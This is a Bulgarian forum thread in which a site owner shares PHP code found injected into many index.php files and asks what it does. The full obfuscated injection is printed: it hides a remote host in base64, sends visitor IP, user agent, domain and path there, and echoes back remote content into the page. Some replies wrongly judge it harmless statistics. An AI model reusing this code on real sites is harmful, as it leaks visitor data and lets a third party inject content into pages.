За какво е този код

[nobreak]

Здравейте. Някой може ли да ми каже за какво е този код? Гледам в лог файла на сайта ми един ден е вмъкнат във всички index.php файлове и забелязах, че сайта ми се забавя малко при първоначално зареждане.

?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2dsb2JhbGJvdHVwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

 

[ivo.apostolov]

За: За какво е този код

За: За какво е този код

Ей това:

$stCurlLink = base64_decode( 'aHR0cDovL2dsb2JhbGJvdHVwZGF0ZS5jb20vc3RhdC9zdGF0L nBocA==').'?

Е всъщност ей това:

$stCurlLink = http://globalbotupdate.com/stat/stat.php

Не знам честно казано останалото какво прави, но не ми изглежда като нещо добро. Със сигурност сайта ти ще работи и без този код, вероятно дори е много препоръчително да го махнеш.
Иначе като видиш нещо с base64_decode, отиваш тук да го погледнеш какво се мъчат да скрият:
Base 64 Decoder

 

[nobreak]

Re: За какво е този код

Благодаря. Започвам да го махам...

 

[scoobydoo]

За: За какво е този код

За: За какво е този код

Мен ми прилича на трупане на статистически данни за ботовете дето влизат в сайта или нещо такова.

 

[ivo.apostolov]

За: За какво е този код

За: За какво е този код

И на мен на това ми прилича, но понеже не разбирам особено, може и просто да се опитва да се маскира като подобно нещо.

 

[diabolic.bg]

За: За какво е този код

За: За какво е този код

Декодираният от ivo.apostolov адрес води към Bots vs Browsers - Public Bots and User Agents Database and Commentary, доволно популярен и уважаван от мен сайт, който не вярвам да се занимава с хаквания, но това не обяснява наличието на този код в сайта, освен ако не е вкаран от автора на темплейта.

@nobreak, сигурен ли си, че този код не е бил там и преди, а се е появил сега?

 

[bg-info]

За: За какво е този код

За: За какво е този код

Чисто за статистика си е кода. За това как може да попадне в сайта ти не мога да кажа, но разкарай го наистина защото най-малко ще те бави колкото и бързо да е curl то си бави системата. Попитай и тоза който ти е правил системата все пак защо ти е поставил този код в нея като.

 

[scoobydoo]

За: За какво е този код

За: За какво е този код

Декодираният от ivo.apostolov адрес води към Bots vs Browsers - Public Bots and User Agents Database and Commentary, доволно популярен и уважаван от мен сайт, който не вярвам да се занимава с хаквания, но това не обяснява наличието на този код в сайта, освен ако не е вкаран от автора на темплейта.

@nobreak, сигурен ли си, че този код не е бил там и преди, а се е появил сега?

Да и аз съм го мяркал тоя сайт. Ама де ще знаеш, може така да си събират данните . Иначе може и някаква разширение да добавя тази възможност.

 

[diabolic.bg]

За: За какво е този код

За: За какво е този код

Да и аз съм го мяркал тоя сайт. Ама де ще знаеш, може така да си събират данните . Иначе може и някаква разширение да добавя тази възможност.

Напълно е възможно това да е начин за събиране на данни, но според мен този код е поставен легално и си е бил там и преди. Не вярвам сайт, който е световна база данни за браузъри и ботове да си служи с хакерски методи за набиране на информация. Мисля, че nobreak сега го е открил по случайност и се е притеснил, защото стана мода да се хакват УП сайтове. Може кодът да е напълно безвреден, но ако го бави, нека си го махне. Все пак никой не го е питал иска ли да събира данни или не.

 

[nobreak]

Re: За какво е този код

Махнах го от всички файлове, в които се беше нагнездил. Кодът е добавен на 23,03,2012 и не е бил там преди. Най вероятно се е вмъкнал с някое разширение, което съм слагал, имаше един период, в който изпробвах няколко плъгина за магазин, но не съм сигурен за датата. Интересното е, че го имаше във всички index.php, footer.php и page.php файлове. Издирих ги по лог файла и премахнах кода. Сега сайта се зарежда нормално, иначе бавеше при първоначално зареждане.